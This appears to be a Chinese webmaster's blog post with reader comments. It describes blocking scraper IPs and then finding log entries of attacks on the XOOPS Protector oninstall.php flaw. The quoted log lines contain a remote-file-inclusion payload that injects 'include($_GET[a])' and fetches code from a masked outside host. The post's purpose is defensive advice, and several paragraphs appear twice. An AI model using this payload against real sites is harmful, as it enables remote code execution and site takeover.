子標題:意外的發現
話說有一天進入池水間後感覺網站速度跟平時有一點點異常,造訪人數亦不尋常地颷高,到cPanel 查看統計記錄,登時傻了眼,124.114.0.*** 和 124.115.4.*** 這兩組IP 由前一天到翌日一直不停在我的主機上抓取,其名單密麻麻地佔一大篇,而且更是亂抓一通,什麼都抓,無視robots.txt存在。到google去查看這兩組IP相關資訊,原來跟我遇到一樣問題者非常之多,而且更是惡名昭彰。當下我就到IP Deny Manager,將這兩組IP封掉。
這跟本文標題有關嗎?當然沒有關,這是前菜,接下來下面才是主菜。
封掉IP後再繼續去查看造訪記錄時,郤有意外發現,而且之後數天亦不時看到有幾個不同IP,出現如下這樣子的記錄
由於我裝的xoops2.3.2 不在本站,是在另一個站上,且xoops_lib 和 xoops_data 這兩個資料夾早已移出根目錄並且變更了名稱,所以 Http Code 顯示了找不到網頁的 404 狀態碼。
如果將/xoops_lib/modules/protector/oninstall.php?mydirname= 這關鍵字輸入google,將會看到滿篇的相關安全資訊。如若閣下還沒有將xoops_lib 和 xoops_data 移出根目錄或變更名稱,請儘早行動,依從官方的安裝文檔說明,將這兩個移出根目錄。
這跟本文標題有關嗎?當然沒有關,這是前菜,接下來下面才是主菜。
封掉IP後再繼續去查看造訪記錄時,郤有意外發現,而且之後數天亦不時看到有幾個不同IP,出現如下這樣子的記錄
**.***.**.*** //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.*****/***/***/id.txt???? Http Code: 404 Date: Feb 19 08:59:59 Http Version: HTTP/1.1 Size in Bytes: - Referer: - Agent: libwww-perl/5.805 /modules/article//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.*****/***/***/id.txt???? Http Code: 404 Date: Feb 19 08:59:59 Http Version: HTTP/1.1 Size in Bytes: - Referer: - Agent: libwww-perl/5.805 /modules/article/view.article.p%20...//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.*****/***/***/id.txt???? Http Code: 404 Date: Feb 19 08:59:59 Http Version: HTTP/1.1 Size in Bytes: - Referer: - Agent: libwww-perl/5.805
由於我裝的xoops2.3.2 不在本站,是在另一個站上,且xoops_lib 和 xoops_data 這兩個資料夾早已移出根目錄並且變更了名稱,所以 Http Code 顯示了找不到網頁的 404 狀態碼。
如果將/xoops_lib/modules/protector/oninstall.php?mydirname= 這關鍵字輸入google,將會看到滿篇的相關安全資訊。如若閣下還沒有將xoops_lib 和 xoops_data 移出根目錄或變更名稱,請儘早行動,依從官方的安裝文檔說明,將這兩個移出根目錄。
一定要移出根目錄
老大~ 請教一下....
一定要移出根目錄
前輩寫的好詳細! 用了您不少時間吧? (好感動~
